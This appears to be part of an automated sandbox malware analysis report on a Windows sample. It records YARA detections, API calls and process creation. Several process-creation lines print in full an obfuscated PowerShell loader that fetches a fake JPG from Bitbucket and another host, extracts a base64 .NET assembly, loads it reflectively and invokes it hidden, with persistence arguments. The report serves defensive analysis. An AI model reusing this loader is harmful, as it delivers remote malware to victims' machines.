        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000007.00000002.2201447313.00000218C3390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7E74F3214
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F8A1E SetUnhandledExceptionFilter,0_2_00007FF7E74F8A1E
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F8714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E74F8714

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_6568.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zgbn@gg@z@@v@gy@zwbk@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@c4@agbw@gc@pw@x@dm@nw@x@de@mw@n@cw@i@@n@gg@d@@z@du@lwbu@ge@bgbv@c8@cgbl@gy@cw@v@gg@zqbh@gq@cw@v@g0@yqbp@g4@lwbu@gu@dwbf@gk@bqbn@de@mg@z@c4@agbw@gc@jw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@pq@g@eq@bwb3@g4@b@bv@ge@z@be@ge@d@bh@ey@cgbv@g0@t@bp@g4@awbz@c@@j@bs@gk@bgbr@hm@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@c0@bgbl@c@@j@bu@hu@b@bs@ck@i@b7@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@g@d0@i@bb@fm@eqbz@hq@zqbt@c4@v@bl@hg@d@@u@eu@bgbj@g8@z@bp@g4@zwbd@do@ogbv@fq@rg@4@c4@rwbl@hq@uwb0@hi@aqbu@gc@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbt@fq@qqbs@fq@pg@+@cc@ow@g@cq@zqbu@gq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@eu@tgbe@d4@pg@n@ds@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@hm@d@bh@hi@d@bg@gw@yqbn@ck@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@zqbu@gq@rgbs@ge@zw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@t@gc@zq@g@d@@i@@t@ge@bgbk@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@gc@d@@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@p@c@@ew@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@cs@pq@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@lgbm@gu@bgbn@hq@a@@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@ygbh@hm@zq@2@dq@t@bl@g4@zwb0@gg@i@@9@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@d
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.ihbddii/selif/gro.makuresadsehteb//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zgbn@gg@z@@v@gy@zwbk@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@c4@agbw@gc@pw@x@dm@nw@x@de@mw@n@cw@i@@n@gg@d@@z@du@lwbu@ge@bgbv@c8@cgbl@gy@cw@v@gg@zqbh@gq@cw@v@g0@yqbp@g4@lwbu@gu@dwbf@gk@bqbn@de@mg@z@c4@agbw@gc@jw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@pq@g@eq@bwb3@g4@b@bv@ge@z@be@ge@d@bh@ey@cgbv@g0@t@bp@g4@awbz@c@@j@bs@gk@bgbr@hm@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@c0@bgbl@c@@j@bu@hu@b@bs@ck@i@b7@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@g@d0@i@bb@fm@eqbz@hq@zqbt@c4@v@bl@hg@d@@u@eu@bgbj@g8@z@bp@g4@zwbd@do@ogbv@fq@rg@4@c4@rwbl@hq@uwb0@hi@aqbu@gc@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbt@fq@qqbs@fq@pg@+@cc@ow@g@cq@zqbu@gq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@eu@tgbe@d4@pg@n@ds@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@hm@d@bh@hi@d@bg@gw@yqbn@ck@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@zqbu@gq@rgbs@ge@zw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@t@gc@zq@g@d@@i@@t@ge@bgbk@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@gc@d@@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@p@c@@ew@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@cs@pq@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@lgbm@gu@bgbn@hq@a@@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@ygbh@hm@zq@2@dq@t@bl@g4@zwb0@gg@i@@9@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@dJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.ihbddii/selif/gro.makuresadsehteb//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F1258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF7E74F1258
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
